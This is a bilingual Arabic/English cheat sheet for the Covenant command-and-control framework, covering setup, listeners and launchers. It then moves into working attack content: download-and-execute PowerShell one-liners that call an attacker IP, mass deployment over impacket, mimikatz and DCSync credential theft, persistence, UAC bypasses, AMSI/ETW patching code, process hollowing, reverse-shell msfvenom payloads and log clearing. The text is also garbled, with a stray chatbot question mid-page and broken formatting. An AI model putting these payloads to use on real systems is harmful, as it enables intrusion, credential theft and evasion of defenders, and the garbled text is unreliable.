دليل إطار التحكم والسيطرة Covenant
## نظرة عامة
Covenant هو إطار للتحكم والسيطرة (C2) مبني على .NET مصمم لعمليات الفريق الأحمر واختبار الاختراق. يتميز بواجهة ويب للتعاون الجماعي، ويدعم بروتوكولات اتصال متعددة، ويوفر إمكانيات ما بعد الاختراق الموسعة المصممة خصيصًا للبيئات Windows باستخدام تجميعات .NET.
⚠️ تحذير: هذه الأداة مخصصة لاختبارات الاختراق المصرح بها وتمارين الفريق الأحمر فقط. تأكد من وجود التفويض المناسب قبل استخدامها ضد أي هدف.
التثبيت
المتطلبات الأساسية
تثبيت Docker (موصى به)
التثبيت اليدوي
تثبيت Kali Linux
الاستخدام الأساسي
الإعداد الأولي
استعراض الواجهة الويب
إدارة المستمعين
إنشاء مستمع HTTP
إنشاء مستمع HTTPS
مستمع Bridge (SMB)
توليد ونشر Grunt
Grunt PowerShell
Grunt الثنائي
Grunt MSBuild
Grunt InstallUtil
إدارة Grunt
تفاعل Grunt
إدارة العمليات
عمليات بيانات الاعتماد
الحركة الجانبية
الوحدات المتقدمة
آليات الاستمرارية
رفع الامتيازات
Would you like me to proceed with translating the specific content for each section?```bash
Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb sudo apt update sudo apt install -y dotnet-sdk-6.0
Verify installation
dotnet —version
### Docker Installation (Recommended)
```bash
# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Docker image
docker build -t covenant .
# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
# Access web interface
# Navigate to https://localhost:7443Manual Installation
# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Covenant
dotnet build
# Run Covenant
dotnet run
# Access web interface at https://localhost:7443Kali Linux Installation
# Install from Kali repositories
sudo apt update
sudo apt install covenant
# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet runBasic Usage
Initial Setup
# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard
# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPasswordWeb Interface Navigation
| القسم | وصف |
|---|---|
| Dashboard | نظرة عامة على الـ active grunts والمستمعين |
| Listeners | إدارة مستمعي الاتصالات |
| Grunts | إدارة المضيفين (الوكلاء) المختَرقين |
| Tasks | تنفيذ الأوامر والوحدات |
| Templates | إدارة قوالب Grunt والمشغلات |
| Users | إدارة المستخدمين والصلاحيات |
| Data | البيانات المجمعة وتنزيلات الملفات |
Listeners Management
Creating HTTP Listener
# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Creating HTTPS Listener
# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodesBridge Listener (SMB)
# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfileGrunt Generation and Deployment
PowerShell Grunt
# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"Binary Grunt
# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
# Download and execute on target
# Binary will be generated as .exe fileMSBuild Grunt
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTask />
</Target>
<UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory"
AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
// Covenant grunt code here
]]>
</Code>
</Task>
</UsingTask>
</Project>
# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xmlInstallUtil Grunt
# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exeGrunt Management
Grunt Interaction
# Basic grunt commands
help # Show available commands
whoami # Get current user context
hostname # Get computer name
pwd # Get current directory
ls # List directory contents
cd [directory] # Change directory
cat [file] # Read file contents
download [file] # Download file from target
upload [local] [remote] # Upload file to targetProcess Management
# Process operations
ps # List running processes
kill [PID] # Terminate process
getpid # Get current process ID
ppid # Get parent process ID
# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into processCredential Operations
# Credential harvesting
mimikatz # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [domain] [user] # DCSync attack
golden [options] # Golden ticket creation
# Token manipulation
steal_token [PID] # Steal process token
make_token [user] [pass] # Create new token
rev2self # Revert to original tokenLateral Movement
# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials
# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting
# Service creation
sc [computer] [service] [binary] # Create and start serviceAdvanced Modules
Persistence Mechanisms
# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
# Service persistence
persist_service [name] [payload] # Windows service
# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscriptionPrivilege Escalation
# UAC bypass techniques
bypassuac [method] # Various UAC bypass methods
eventvwr # Event Viewer UAC bypass
fodhelper # FodHelper UAC bypass
computerdefaults # Computer Defaults UAC bypass
# Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation
ms16-135 # Windows Kernel-Mode Drivers EoPData Collection
# System information
sysinfo # Detailed system information
env # Environment variables
netstat # Network connections
arp # ARP table
route # Routing table
# File system operations
find [pattern] # Search for files
tree [directory] # Directory tree
drives # List available drivesNetwork Operations
# Port scanning
portscan [target] [ports] # TCP port scan
ping [target] # ICMP ping
nslookup [hostname] # DNS lookup
# Network shares
net share # List local shares
net use # List network connections
net view [computer] # List remote sharesTeam Collaboration
User Management
# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management onlyData Sharing
# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis
# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential databaseReporting
# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summaryAutomation and Scripting
Grunt Automation Script
// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;
public class AutomationScript
\\\\{
public async Task ExecuteAutomation(Grunt grunt)
\\\\{
// Automated reconnaissance
await grunt.ExecuteTask("whoami");
await grunt.ExecuteTask("hostname");
await grunt.ExecuteTask("sysinfo");
await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\\\}PowerShell Automation
# PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\\\{
param(
[string]$CovenantURL = "https://localhost:7443",
[string]$Username,
[string]$Password
)
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"Batch Grunt Deployment
#!/bin/bash
# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"
# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
# Deploy to multiple targets
while read -r target; do
echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE"Evasion Techniques
AMSI Bypass
// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiContext = Marshal.AllocHGlobal(9076);
var amsiSession = Marshal.AllocHGlobal(9076);
var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}ETW Bypass
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}Process Hollowing
// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
\\\\{
var startupInfo = new STARTUPINFO();
var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\\\}Integration with Other Tools
Metasploit Integration
# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
execute C:\Windows\Temp\update.exe
# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
runBloodHound Integration
# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip fileCrackMapExec Integration
# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
# Verify Covenant grunt connection
# Use Covenant for further exploitationOperational Security
Communication Security
# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents
# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificateTraffic Obfuscation
# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)Anti-Forensics
# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysisTroubleshooting
Common Issues
# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequencyDebug Mode
# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolutionDatabase Issues
# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run
# Backup database
cp Data/covenant.db Data/covenant.db.backup
# Restore database
cp Data/covenant.db.backup Data/covenant.dbأفضل الممارسات
التخطيط التشغيلي```bash
Secure Covenant deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Grunt management
Use unique grunt names
Implement kill dates
Regular grunt rotation
Secure communication channels
**إعداد ما قبل المشاركة**: تكوين المستمعين والملفات الشخصية قبل المشاركةbash
Maintain operation logs
Document all activities
Track compromised systems
Record credential harvesting
Generate executive reports
### اعتبارات الأمن
https://www.youtube.com/watch?v=E_K0nduqeuQ
### التوثيق
https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/
## الموارد
- [مستودع Covenant على GitHub](